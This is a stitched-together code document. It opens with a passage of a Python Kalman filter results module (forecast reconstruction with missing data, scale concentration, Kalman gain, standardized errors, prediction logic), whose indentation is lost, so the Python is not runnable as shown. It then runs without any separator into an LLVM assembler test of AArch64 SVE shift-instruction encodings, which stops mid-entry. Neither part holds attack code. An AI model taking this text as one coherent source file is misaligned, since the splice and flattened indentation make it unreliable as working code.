# case we will replace self.llf_obs = None at that time.
self.llf_obs = np.array(kalman_filter.loglikelihood, copy=True)
# Diffuse objects
self.nobs_diffuse = kalman_filter.nobs_diffuse
self.initial_diffuse_state_cov = None
self.forecasts_error_diffuse_cov = None
self.predicted_diffuse_state_cov = None
if self.nobs_diffuse > 0:
self.initial_diffuse_state_cov = np.array(
kalman_filter.model.initial_diffuse_state_cov, copy=True)
self.predicted_diffuse_state_cov = np.array(
kalman_filter.predicted_diffuse_state_cov, copy=True)
if has_missing and not self.filter_collapsed:
self.forecasts_error_diffuse_cov = np.array(
reorder_missing_matrix(
kalman_filter.forecast_error_diffuse_cov,
self.missing, reorder_cols=True, reorder_rows=True,
prefix=self.prefix))
else:
self.forecasts_error_diffuse_cov = np.array(
kalman_filter.forecast_error_diffuse_cov, copy=True)
# If there was missing data, save the original values from the Kalman
# filter output, since below will set the values corresponding to
# the missing observations to nans.
self.missing_forecasts = None
self.missing_forecasts_error = None
self.missing_forecasts_error_cov = None
if np.sum(self.nmissing) > 0:
# Copy the provided arrays (which are as the Kalman filter dataset)
# into new variables
self.missing_forecasts = np.copy(self.forecasts)
self.missing_forecasts_error = np.copy(self.forecasts_error)
self.missing_forecasts_error_cov = (
np.copy(self.forecasts_error_cov)
)
# Save the collapsed values
self.collapsed_forecasts = None
self.collapsed_forecasts_error = None
self.collapsed_forecasts_error_cov = None
if self.filter_collapsed:
# Copy the provided arrays (which are from the collapsed dataset)
# into new variables
self.collapsed_forecasts = self.forecasts[:self.k_states, :]
self.collapsed_forecasts_error = (
self.forecasts_error[:self.k_states, :]
)
self.collapsed_forecasts_error_cov = (
self.forecasts_error_cov[:self.k_states, :self.k_states, :]
)
# Recreate the original arrays (which should be from the original
# dataset) in the appropriate dimension
dtype = self.collapsed_forecasts.dtype
self.forecasts = np.zeros((self.k_endog, self.nobs), dtype=dtype)
self.forecasts_error = np.zeros((self.k_endog, self.nobs),
dtype=dtype)
self.forecasts_error_cov = (
np.zeros((self.k_endog, self.k_endog, self.nobs), dtype=dtype)
)
# Fill in missing values in the forecast, forecast error, and
# forecast error covariance matrix (this is required due to how the
# Kalman filter implements observations that are either partly or
# completely missing)
# Construct the predictions, forecasts
can_compute_mean = not (self.memory_no_forecast_mean or
self.memory_no_predicted_mean)
can_compute_cov = not (self.memory_no_forecast_cov or
self.memory_no_predicted_cov)
if can_compute_mean or can_compute_cov:
for t in range(self.nobs):
design_t = 0 if self.design.shape[2] == 1 else t
obs_cov_t = 0 if self.obs_cov.shape[2] == 1 else t
obs_intercept_t = 0 if self.obs_intercept.shape[1] == 1 else t
# For completely missing observations, the Kalman filter will
# produce forecasts, but forecast errors and the forecast
# error covariance matrix will be zeros - make them nan to
# improve clarity of results.
if self.nmissing[t] > 0:
mask = ~self.missing[:, t].astype(bool)
# We can recover forecasts
# For partially missing observations, the Kalman filter
# will produce all elements (forecasts, forecast errors,
# forecast error covariance matrices) as usual, but their
# dimension will only be equal to the number of non-missing
# elements, and their location in memory will be in the
# first blocks (e.g. for the forecasts_error, the first
# k_endog - nmissing[t] columns will be filled in),
# regardless of which endogenous variables they refer to
# (i.e. the non- missing endogenous variables for that
# observation). Furthermore, the forecast error covariance
# matrix is only valid for those elements. What is done is
# to set all elements to nan for these observations so that
# they are flagged as missing. The variables
# missing_forecasts, etc. then provide the forecasts, etc.
# provided by the Kalman filter, from which the data can be
# retrieved if desired.
if can_compute_mean:
self.forecasts[:, t] = np.dot(
self.design[:, :, design_t],
self.predicted_state[:, t]
) + self.obs_intercept[:, obs_intercept_t]
self.forecasts_error[:, t] = np.nan
self.forecasts_error[mask, t] = (
self.endog[mask, t] - self.forecasts[mask, t])
# TODO: We should only fill in the non-masked elements of
# this array. Also, this will give the multivariate version
# even if univariate filtering was selected. Instead, we
# should use the reordering methods and then replace the
# masked values with NaNs
if can_compute_cov:
self.forecasts_error_cov[:, :, t] = np.dot(
np.dot(self.design[:, :, design_t],
self.predicted_state_cov[:, :, t]),
self.design[:, :, design_t].T
) + self.obs_cov[:, :, obs_cov_t]
# In the collapsed case, everything just needs to be rebuilt
# for the original observed data, since the Kalman filter
# produced these values for the collapsed data.
elif self.filter_collapsed:
if can_compute_mean:
self.forecasts[:, t] = np.dot(
self.design[:, :, design_t],
self.predicted_state[:, t]
) + self.obs_intercept[:, obs_intercept_t]
self.forecasts_error[:, t] = (
self.endog[:, t] - self.forecasts[:, t]
)
if can_compute_cov:
self.forecasts_error_cov[:, :, t] = np.dot(
np.dot(self.design[:, :, design_t],
self.predicted_state_cov[:, :, t]),
self.design[:, :, design_t].T
) + self.obs_cov[:, :, obs_cov_t]
# Note: if we concentrated out the scale, need to adjust the
# loglikelihood values and all of the covariance matrices and the
# values that depend on the covariance matrices
# Note: concentrated computation is not permitted with collapsed
# version, so we do not need to modify collapsed arrays.
self.scale = 1.
if self.filter_concentrated and self.model._scale is None:
d = max(self.loglikelihood_burn, self.nobs_diffuse)
# Compute the scale
nmissing = np.array(kalman_filter.model.nmissing)
nobs_k_endog = np.sum(self.k_endog - nmissing[d:])
# In the univariate case, we need to subtract observations
# associated with a singular forecast error covariance matrix
nobs_k_endog -= kalman_filter.nobs_kendog_univariate_singular
scale_obs = np.array(kalman_filter.scale, copy=True)
if not self.memory_no_likelihood:
self.scale = np.sum(scale_obs[d:]) / nobs_k_endog
else:
self.scale = scale_obs[0] / nobs_k_endog
# Need to modify this for diffuse initialization, since for
# diffuse periods we only need to add in the scale value if the
# diffuse forecast error covariance matrix element was singular
nsingular = 0
if kalman_filter.nobs_diffuse > 0:
Finf = kalman_filter.forecast_error_diffuse_cov
singular = (np.diagonal(Finf).real <=
kalman_filter.tolerance_diffuse)
nsingular = np.sum(~singular, axis=1)
# Adjust the loglikelihood obs (see `KalmanFilter.loglikeobs` for
# defaults on the adjustment)
if not self.memory_no_likelihood:
self.llf_obs += -0.5 * (
(self.k_endog - nmissing - nsingular) * np.log(self.scale)
+ scale_obs / self.scale)
else:
self.llf_obs[0] += -0.5 * (np.sum(
(self.k_endog - nmissing - nsingular) * np.log(self.scale))
+ scale_obs / self.scale)
# Scale the filter output
self.obs_cov = self.obs_cov * self.scale
self.state_cov = self.state_cov * self.scale
self.initial_state_cov = self.initial_state_cov * self.scale
self.predicted_state_cov = self.predicted_state_cov * self.scale
self.filtered_state_cov = self.filtered_state_cov * self.scale
self.forecasts_error_cov = self.forecasts_error_cov * self.scale
if self.missing_forecasts_error_cov is not None:
self.missing_forecasts_error_cov = (
self.missing_forecasts_error_cov * self.scale)
# Note: do not have to adjust the Kalman gain or tmp4
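# (tmp1 varies proportionally with the covariance matrices, while tmp2
# and tmp3 involve the inverse forecast error covariance matrix and so
# scale inversely)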
self.tmp1 = self.tmp1 * self.scale
self.tmp2 = self.tmp2 / self.scale
self.tmp3 = self.tmp3 / self.scale
if not (self.memory_no_std_forecast or
self.invert_lu or
self.solve_lu or
self.filter_collapsed):
self._standardized_forecasts_error = (
self._standardized_forecasts_error / self.scale**0.5)
# The self.model._scale value is only not None within a fixed_scale
# context, in which case it is set and indicates that we should
# generally view this results object as using a concentrated scale
# (e.g. for d.o.f. computations), but because the fixed scale was
# actually applied to the model prior to filtering, we do not need to
# make any adjustments to the filter output, etc.
elif self.model._scale is not None:
self.filter_concentrated = True
self.scale = self.model._scale
# Now, save self.llf, and handle the memory_no_likelihood case
if not self.memory_no_likelihood:
self.llf = np.sum(self.llf_obs[self.loglikelihood_burn:])
else:
self.llf = self.llf_obs[0]
self.llf_obs = None
@property
def kalman_gain(self):
"""
Kalman gain matrices
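Notes
-----
If the gain was not stored by the filter, it is reconstructed below
from the stored output as :math:`K_t = T_t P_{t|t-1} Z_t' F_t^{-1}`,
with missing observations handled by masking.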
"""
if self._kalman_gain is None:
# k x n
self._kalman_gain = np.zeros(
(self.k_states, self.k_endog, self.nobs), dtype=self.dtype)
for t in range(self.nobs):
# In the case of entirely missing observations, let the Kalman
# gain be zeros.
if self.nmissing[t] == self.k_endog:
continue
design_t = 0 if self.design.shape[2] == 1 else t
transition_t = 0 if self.transition.shape[2] == 1 else t
if self.nmissing[t] == 0:
self._kalman_gain[:, :, t] = np.dot(
np.dot(
self.transition[:, :, transition_t],
self.predicted_state_cov[:, :, t]
),
np.dot(
np.transpose(self.design[:, :, design_t]),
np.linalg.inv(self.forecasts_error_cov[:, :, t])
)
)
else:
mask = ~self.missing[:, t].astype(bool)
F = self.forecasts_error_cov[np.ix_(mask, mask, [t])]
self._kalman_gain[:, mask, t] = np.dot(
np.dot(
self.transition[:, :, transition_t],
self.predicted_state_cov[:, :, t]
),
np.dot(
np.transpose(self.design[mask, :, design_t]),
np.linalg.inv(F[:, :, 0])
)
)
return self._kalman_gain
@property
def standardized_forecasts_error(self):
r"""
Standardized forecast errors
Notes
-----
The forecast errors produced by the Kalman filter are
.. math::
v_t \sim N(0, F_t)
Hypothesis tests are usually applied to the standardized residuals
.. math::
v_t^s = B_t v_t \sim N(0, I)
where :math:`B_t = L_t^{-1}` and :math:`F_t = L_t L_t'`; then
:math:`F_t^{-1} = (L_t')^{-1} L_t^{-1} = B_t' B_t`; :math:`B_t`
and :math:`L_t` are lower triangular. Finally,
:math:`B_t v_t \sim N(0, B_t F_t B_t')` and
:math:`B_t F_t B_t' = L_t^{-1} L_t L_t' (L_t')^{-1} = I`.
Thus we can rewrite :math:`v_t^s = L_t^{-1} v_t` or
:math:`L_t v_t^s = v_t`; the latter equation is the form required to
use a linear solver to recover :math:`v_t^s`. Since :math:`L_t` is
lower triangular, we can use a triangular solver (?TRTRS).
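For example, a small numerical sketch of this triangular solve, with
purely illustrative values:
>>> import numpy as np
>>> from scipy import linalg
>>> F = np.array([[4., 2.], [2., 5.]])  # forecast error covariance
>>> v = np.array([1., 3.])              # forecast error
>>> L = np.linalg.cholesky(F)
>>> v_std = linalg.solve_triangular(L, v, lower=True)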
"""
if (self._standardized_forecasts_error is None
and not self.memory_no_forecast):
if self.k_endog == 1:
self._standardized_forecasts_error = (
self.forecasts_error /
self.forecasts_error_cov[0, 0, :]**0.5)
else:
from scipy import linalg
self._standardized_forecasts_error = np.zeros(
self.forecasts_error.shape, dtype=self.dtype)
for t in range(self.forecasts_error_cov.shape[2]):
if self.nmissing[t] > 0:
self._standardized_forecasts_error[:, t] = np.nan
if self.nmissing[t] < self.k_endog:
mask = ~self.missing[:, t].astype(bool)
F = self.forecasts_error_cov[np.ix_(mask, mask, [t])]
try:
upper, _ = linalg.cho_factor(F[:, :, 0])
self._standardized_forecasts_error[mask, t] = (
linalg.solve_triangular(
upper, self.forecasts_error[mask, t],
trans=1))
except linalg.LinAlgError:
self._standardized_forecasts_error[mask, t] = (
np.nan)
return self._standardized_forecasts_error
def predict(self, start=None, end=None, dynamic=None, **kwargs):
r"""
In-sample and out-of-sample prediction for state space models generally
Parameters
----------
start : int, optional
Zero-indexed observation number at which to start prediction, i.e.,
the first prediction will be at start.
end : int, optional
Zero-indexed observation number at which to end prediction, i.e.,
the last prediction will be at end.
dynamic : int, optional
Offset relative to `start` at which to begin dynamic prediction.
Prior to this observation, true endogenous values will be used for
prediction; starting with this observation and continuing through
the end of prediction, predicted endogenous values will be used
instead.
**kwargs
If the prediction range is outside of the sample range, any
of the state space representation matrices that are time-varying
must have updated values provided for the out-of-sample range.
For example, if `obs_intercept` is a time-varying component and
the prediction range extends 10 periods beyond the end of the
sample, a (`k_endog` x 10) matrix must be provided with the new
intercept values.
Returns
-------
results : kalman_filter.PredictionResults
A PredictionResults object.
Notes
-----
All prediction is performed by applying the deterministic part of the
measurement equation using the predicted state variables.
Out-of-sample prediction first applies the Kalman filter to missing
data for the number of periods desired to obtain the predicted states.
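Examples
--------
A sketch combining in-sample prediction with a five-period forecast,
assuming `res` is a FilterResults instance for a model with
`nobs` = 100 and no memory conservation:
>>> pred = res.predict(start=0, end=105)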
"""
# Get the start and the end of the entire prediction range
if start is None:
start = 0
elif start < 0:
raise ValueError('Cannot predict values previous to the sample.')
if end is None:
end = self.nobs
# Prediction and forecasting are performed by iterating the Kalman
# filter through the entire range [0, end].
# Then, everything is returned corresponding to the range [start, end].
# In order to perform the calculations, the range is separately split
# up into the following categories:
# - static: (in-sample) the Kalman filter is run as usual
# - dynamic: (in-sample) the Kalman filter is run, but on missing data
# - forecast: (out-of-sample) the Kalman filter is run, but on missing
# data
# Short-circuit if end is before start
if end <= start:
raise ValueError('End of prediction must be after start.')
# Get the number of forecasts to make after the end of the sample
nforecast = max(0, end - self.nobs)
# Get the number of dynamic prediction periods
# If `dynamic=True`, then assume that we want to begin dynamic
# prediction at the start of the sample prediction.
if dynamic is True:
dynamic = 0
# If `dynamic=False`, then assume we want no dynamic prediction
if dynamic is False:
dynamic = None
# Check validity of dynamic and warn or error if issues
dynamic, ndynamic = _check_dynamic(dynamic, start, end, self.nobs)
# Get the number of in-sample static predictions
if dynamic is None:
nstatic = min(end, self.nobs) - min(start, self.nobs)
else:
# (use max(., 0), since dynamic can be prior to start)
nstatic = max(dynamic - start, 0)
# Cannot do in-sample prediction if we do not have appropriate
# arrays (we can do out-of-sample forecasting, however)
if nstatic > 0 and self.memory_no_forecast_mean:
raise ValueError('In-sample prediction is not available if memory'
' conservation has been used to avoid storing'
' forecast means.')
# Cannot do dynamic in-sample prediction if we do not have appropriate
# arrays (we can do out-of-sample forecasting, however)
if ndynamic > 0 and self.memory_no_predicted:
raise ValueError('In-sample dynamic prediction is not available if'
' memory conservation has been used to avoid'
' storing forecasted or predicted state means'
' or covariances.')
# Construct the predicted state and covariance matrix for each time
# period depending on whether that time period corresponds to
# one-step-ahead prediction, dynamic prediction, or out-of-sample
# forecasting.
# If we only have simple prediction, then we can use the already saved
# Kalman filter output
if ndynamic == 0 and nforecast == 0:
results = self
# If we have dynamic prediction or forecasting, then we need to
# re-apply the Kalman filter
else:
# Figure out the period for which we need to run the Kalman filter
if dynamic is not None:
kf_start = min(start, dynamic, self.nobs)
else:
kf_start = min(start, self.nobs)
kf_end = end
# Make start, end consistent with the results that we're generating
start = max(start - kf_start, 0)
end = kf_end - kf_start
# We must at least store forecasts and predictions
kwargs['conserve_memory'] = (
self.conserve_memory & ~MEMORY_NO_FORECAST &
~MEMORY_NO_PREDICTED)
# Can't use Chandrasekhar recursions for prediction
kwargs['filter_method'] = (
self.model.filter_method & ~FILTER_CHANDRASEKHAR)
# Even if we have not stored all predicted values (means and covs),
# we can still do pure out-of-sample forecasting because we will
# always have stored the last predicted values. In this case, we
# will initialize the forecasting filter with these values
if self.memory_no_predicted:
constant = self.predicted_state[..., -1]
stationary_cov = self.predicted_state_cov[..., -1]
# Otherwise initialize with the predicted state / cov from the
# existing results, at index kf_start (note that the time
# dimension of predicted_state and predicted_state_cov is
# self.nobs + 1; so e.g. in the case of pure forecasting we should
# be using the very last predicted state and predicted state cov
# elements, and kf_start will equal self.nobs which is correct)
else:
constant = self.predicted_state[..., kf_start]
stationary_cov = self.predicted_state_cov[..., kf_start]
kwargs.update({'initialization': 'known',
'constant': constant,
'stationary_cov': stationary_cov})
            # Construct the new endogenous array; it is entirely NaN, so these
            # periods are treated as missing and only forecasts are produced.
            endog = np.full((nforecast, self.k_endog), np.nan)
model = self.model.extend(
endog, start=kf_start, end=kf_end - nforecast, **kwargs)
# Have to retroactively modify the model's endog
if ndynamic > 0:
model.endog[:, -(ndynamic + nforecast):] = np.nan
with model.fixed_scale(self.scale):
results = model.filter()
return PredictionResults(results, start, end, nstatic, ndynamic,
nforecast)
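# Illustrative usage sketch (hypothetical `res` results object for a model
# with res.nobs == 100; not part of the original module): a combined
# in-sample and out-of-sample prediction could be requested as
#
#     pred = res.predict(start=90, end=110, dynamic=5)
#
# which yields nstatic == 5 (periods 90-94), ndynamic == 5 (periods 95-99)
# and nforecast == 10 (periods 100-109), so npredictions == end - start == 20.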
class PredictionResults(FilterResults):
r"""
Results of in-sample and out-of-sample prediction for state space models
generally
Parameters
----------
results : FilterResults
Output from filtering, corresponding to the prediction desired
start : int
Zero-indexed observation number at which to start forecasting,
i.e., the first forecast will be at start.
end : int
Zero-indexed observation number at which to end forecasting, i.e.,
the last forecast will be at end.
nstatic : int
Number of in-sample static predictions (these are always the first
elements of the prediction output).
ndynamic : int
Number of in-sample dynamic predictions (these always follow the static
predictions directly, and are directly followed by the forecasts).
nforecast : int
        Number of out-of-sample forecasts (these always follow the dynamic
predictions directly).
Attributes
----------
npredictions : int
Number of observations in the predicted series; this is not necessarily
the same as the number of observations in the original model from which
prediction was performed.
start : int
Zero-indexed observation number at which to start prediction,
i.e., the first predict will be at `start`; this is relative to the
original model from which prediction was performed.
end : int
Zero-indexed observation number at which to end prediction,
i.e., the last predict will be at `end`; this is relative to the
original model from which prediction was performed.
nstatic : int
Number of in-sample static predictions.
ndynamic : int
Number of in-sample dynamic predictions.
nforecast : int
        Number of out-of-sample forecasts.
endog : ndarray
The observation vector.
design : ndarray
The design matrix, :math:`Z`.
obs_intercept : ndarray
The intercept for the observation equation, :math:`d`.
obs_cov : ndarray
The covariance matrix for the observation equation :math:`H`.
transition : ndarray
The transition matrix, :math:`T`.
state_intercept : ndarray
The intercept for the transition equation, :math:`c`.
selection : ndarray
The selection matrix, :math:`R`.
state_cov : ndarray
The covariance matrix for the state equation :math:`Q`.
filtered_state : ndarray
The filtered state vector at each time period.
filtered_state_cov : ndarray
The filtered state covariance matrix at each time period.
predicted_state : ndarray
The predicted state vector at each time period.
predicted_state_cov : ndarray
The predicted state covariance matrix at each time period.
forecasts : ndarray
The one-step-ahead forecasts of observations at each time period.
forecasts_error : ndarray
The forecast errors at each time period.
forecasts_error_cov : ndarray
The forecast error covariance matrices at each time period.
Notes
-----
The provided ranges must be conformable, meaning that it must be that
`end - start == nstatic + ndynamic + nforecast`.
This class is essentially a view to the FilterResults object, but
returning the appropriate ranges for everything.
"""
    representation_attributes = [
        'design', 'obs_intercept', 'obs_cov',
        'transition', 'state_intercept', 'selection',
        'state_cov'
    ]
filter_attributes = [
'filtered_state', 'filtered_state_cov',
'predicted_state', 'predicted_state_cov',
'forecasts', 'forecasts_error', 'forecasts_error_cov'
]
def __init__(self, results, start, end, nstatic, ndynamic, nforecast):
# Save the filter results object
self.results = results
# Save prediction ranges
        self.npredictions = end - start
self.start = start
self.end = end
self.nstatic = nstatic
self.ndynamic = ndynamic
self.nforecast = nforecast
def clear(self):
attributes = (['endog'] + self.representation_attributes
+ self.filter_attributes)
for attr in attributes:
_attr = '_' + attr
if hasattr(self, _attr):
delattr(self, _attr)
def __getattr__(self, attr):
"""
Provide access to the representation and filtered output in the
appropriate range (`start` - `end`).
"""
# Prevent infinite recursive lookups
if attr[0] == '_':
raise AttributeError("'%s' object has no attribute '%s'" %
(self.__class__.__name__, attr))
_attr = '_' + attr
# Cache the attribute
if not hasattr(self, _attr):
if attr == 'endog' or attr in self.filter_attributes:
# Get a copy
value = getattr(self.results, attr).copy()
# Subset to the correct time frame
value = value[..., self.start:self.end]
elif attr in self.representation_attributes:
value = getattr(self.results, attr).copy()
# If a time-invariant matrix, return it. Otherwise, subset to
# the correct period.
if value.shape[-1] == 1:
value = value[..., 0]
else:
value = value[..., self.start:self.end]
else:
raise AttributeError("'%s' object has no attribute '%s'" %
(self.__class__.__name__, attr))
setattr(self, _attr, value)
return getattr(self, _attr)
def _check_dynamic(dynamic, start, end, nobs):
"""
Verify dynamic and warn or error if issues
Parameters
----------
dynamic : {int, None}
The offset relative to start of the dynamic forecasts. None if no
dynamic forecasts are required.
start : int
The location of the first forecast.
end : int
The location of the final forecast (inclusive).
nobs : int
The number of observations in the time series.
Returns
-------
dynamic : {int, None}
The start location of the first dynamic forecast. None if there
are no in-sample dynamic forecasts.
ndynamic : int
The number of dynamic forecasts
"""
if dynamic is None:
return dynamic, 0
# Replace the relative dynamic offset with an absolute offset
dynamic = start + dynamic
# Validate the `dynamic` parameter
if dynamic < 0:
raise ValueError('Dynamic prediction cannot begin prior to the'
' first observation in the sample.')
elif dynamic > end:
warn('Dynamic prediction specified to begin after the end of'
' prediction, and so has no effect.', ValueWarning)
return None, 0
elif dynamic > nobs:
warn('Dynamic prediction specified to begin during'
' out-of-sample forecasting period, and so has no'
' effect.', ValueWarning)
return None, 0
# Get the total size of the desired dynamic forecasting component
# Note: the first `dynamic` periods of prediction are actually
# *not* dynamic, because dynamic prediction begins at observation
# `dynamic`.
ndynamic = max(0, min(end, nobs) - dynamic)
return dynamic, ndynamic
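# Worked example for _check_dynamic (hypothetical values): with start=5,
# end=20 and nobs=15, a relative offset dynamic=3 becomes the absolute offset
# 5 + 3 = 8, giving ndynamic = min(20, 15) - 8 = 7 dynamic periods.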
// RUN: llvm-mc -triple=aarch64 -show-encoding -mattr=+sve < %s \
// RUN: | FileCheck %s --check-prefixes=CHECK-ENCODING,CHECK-INST
// RUN: not llvm-mc -triple=aarch64 -show-encoding < %s 2>&1 \
// RUN: | FileCheck %s --check-prefix=CHECK-ERROR
// RUN: llvm-mc -triple=aarch64 -filetype=obj -mattr=+sve < %s \
// RUN: | llvm-objdump -d -mattr=+sve - | FileCheck %s --check-prefix=CHECK-INST
// RUN: llvm-mc -triple=aarch64 -filetype=obj -mattr=+sve < %s \
// RUN: | llvm-objdump -d - | FileCheck %s --check-prefix=CHECK-UNKNOWN
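// The RUN lines above exercise, in order: assembly with +sve (checking both
// the printed form and the encoding bytes), the diagnostic produced when sve
// is not enabled, and an object-file round trip through llvm-objdump with and
// without SVE disassembly support.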
lsr z0.b, z0.b, #1
// CHECK-INST: lsr z0.b, z0.b, #1
// CHECK-ENCODING: [0x00,0x94,0x2f,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: 00 94 2f 04 <unknown>
lsr z31.b, z31.b, #8
// CHECK-INST: lsr z31.b, z31.b, #8
// CHECK-ENCODING: [0xff,0x97,0x28,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: ff 97 28 04 <unknown>
lsr z0.h, z0.h, #1
// CHECK-INST: lsr z0.h, z0.h, #1
// CHECK-ENCODING: [0x00,0x94,0x3f,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: 00 94 3f 04 <unknown>
lsr z31.h, z31.h, #16
// CHECK-INST: lsr z31.h, z31.h, #16
// CHECK-ENCODING: [0xff,0x97,0x30,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: ff 97 30 04 <unknown>
lsr z0.s, z0.s, #1
// CHECK-INST: lsr z0.s, z0.s, #1
// CHECK-ENCODING: [0x00,0x94,0x7f,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: 00 94 7f 04 <unknown>
lsr z31.s, z31.s, #32
// CHECK-INST: lsr z31.s, z31.s, #32
// CHECK-ENCODING: [0xff,0x97,0x60,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: ff 97 60 04 <unknown>
lsr z0.d, z0.d, #1
// CHECK-INST: lsr z0.d, z0.d, #1
// CHECK-ENCODING: [0x00,0x94,0xff,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: 00 94 ff 04 <unknown>
lsr z31.d, z31.d, #64
// CHECK-INST: lsr z31.d, z31.d, #64
// CHECK-ENCODING: [0xff,0x97,0xa0,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: ff 97 a0 04 <unknown>
lsr z0.b, p0/m, z0.b, #1
// CHECK-INST: lsr z0.b, p0/m, z0.b, #1
// CHECK-ENCODING: [0xe0,0x81,0x01,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: e0 81 01 04 <unknown>
lsr z31.b, p0/m, z31.b, #8
// CHECK-INST: lsr z31.b, p0/m, z31.b, #8
// CHECK-ENCODING: [0x1f,0x81,0x01,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: 1f 81 01 04 <unknown>
lsr z0.h, p0/m, z0.h, #1
// CHECK-INST: lsr z0.h, p0/m, z0.h, #1
// CHECK-ENCODING: [0xe0,0x83,0x01,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: e0 83 01 04 <unknown>
lsr z31.h, p0/m, z31.h, #16
// CHECK-INST: lsr z31.h, p0/m, z31.h, #16
// CHECK-ENCODING: [0x1f,0x82,0x01,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: 1f 82 01 04 <unknown>
lsr z0.s, p0/m, z0.s, #1
// CHECK-INST: lsr z0.s, p0/m, z0.s, #1
// CHECK-ENCODING: [0xe0,0x83,0x41,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: e0 83 41 04 <unknown>
lsr z31.s, p0/m, z31.s, #32
// CHECK-INST: lsr z31.s, p0/m, z31.s, #32
// CHECK-ENCODING: [0x1f,0x80,0x41,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: 1f 80 41 04 <unknown>
lsr z0.d, p0/m, z0.d, #1
// CHECK-INST: lsr z0.d, p0/m, z0.d, #1
// CHECK-ENCODING: [0xe0,0x83,0xc1,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: e0 83 c1 04 <unknown>
lsr z31.d, p0/m, z31.d, #64
// CHECK-INST: lsr z31.d, p0/m, z31.d, #64
// CHECK-ENCODING: [0x1f,0x80,0x81,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: 1f 80 81 04 <unknown>
lsr z0.b, p0/m, z0.b, z0.b
// CHECK-INST: lsr z0.b, p0/m, z0.b, z0.b
// CHECK-ENCODING: [0x00,0x80,0x11,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: 00 80 11 04 <unknown>
lsr z0.h, p0/m, z0.h, z0.h
// CHECK-INST: lsr z0.h, p0/m, z0.h, z0.h
// CHECK-ENCODING: [0x00,0x80,0x51,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: 00 80 51 04 <unknown>
lsr z0.s, p0/m, z0.s, z0.s
// CHECK-INST: lsr z0.s, p0/m, z0.s, z0.s
// CHECK-ENCODING: [0x00,0x80,0x91,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: 00 80 91 04 <unknown>
lsr z0.d, p0/m, z0.d, z0.d
// CHECK-INST: lsr z0.d, p0/m, z0.d, z0.d
// CHECK-ENCODING: [0x00,0x80,0xd1,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: 00 80 d1 04 <unknown>
lsr z0.b, p0/m, z0.b, z1.d
// CHECK-INST: lsr z0.b, p0/m, z0.b, z1.d
// CHECK-ENCODING: [0x20,0x80,0x19,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: 20 80 19 04 <unknown>
lsr z0.h, p0/m, z0.h, z1.d
// CHECK-INST: lsr z0.h, p0/m, z0.h, z1.d
// CHECK-ENCODING: [0x20,0x80,0x59,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: 20 80 59 04 <unknown>
lsr z0.s, p0/m, z0.s, z1.d
// CHECK-INST: lsr z0.s, p0/m, z0.s, z1.d
// CHECK-ENCODING: [0x20,0x80,0x99,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: 20 80 99 04 <unknown>
lsr z0.b, z1.b, z2.d
// CHECK-INST: lsr z0.b, z1.b, z2.d
// CHECK-ENCODING: [0x20,0x84,0x22,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: 20 84 22 04 <unknown>
lsr z0.h, z1.h, z2.d
// CHECK-INST: lsr z0.h, z1.h, z2.d
// CHECK-ENCODING: [0x20,0x84,0x62,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: 20 84 62 04 <unknown>
lsr z0.s, z1.s, z2.d
// CHECK-INST: lsr z0.s, z1.s, z2.d
// CHECK-ENCODING: [0x20,0x84,0xa2,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: 20 84 a2 04 <unknown>
// --------------------------------------------------------------------------//
// Test compatibility with MOVPRFX instruction.
movprfx z31.d, p0/z, z6.d
// CHECK-INST: movprfx z31.d, p0/z, z6.d
// CHECK-ENCODING: [0xdf,0x20,0xd0,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: df 20 d0 04 <unknown>
lsr z31.d, p0/m, z31.d, #64
// CHECK-INST: lsr z31.d, p0/m, z31.d, #64
// CHECK-ENCODING: [0x1f,0x80,0x81,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: 1f 80 81 04 <unknown>
movprfx z31, z6
// CHECK-INST: movprfx z31, z6
// CHECK-ENCODING: [0xdf,0xbc,0x20,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: df bc 20 04 <unknown>
lsr z31.d, p0/m, z31.d, #64
// CHECK-INST: lsr z31.d, p0/m, z31.d, #64
// CHECK-ENCODING: [0x1f,0x80,0x81,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: 1f 80 81 04 <unknown>
movprfx z0.s, p0/z, z7.s
// CHECK-INST: movprfx z0.s, p0/z, z7.s
// CHECK-ENCODING: [0xe0,0x20,0x90,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: e0 20 90 04 <unknown>
lsr z0.s, p0/m, z0.s, z1.d
// CHECK-INST: lsr z0.s, p0/m, z0.s, z1.d
// CHECK-ENCODING: [0x20,0x80,0x99,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: 20 80 99 04 <unknown>
movprfx z0, z7
// CHECK-INST: movprfx z0, z7
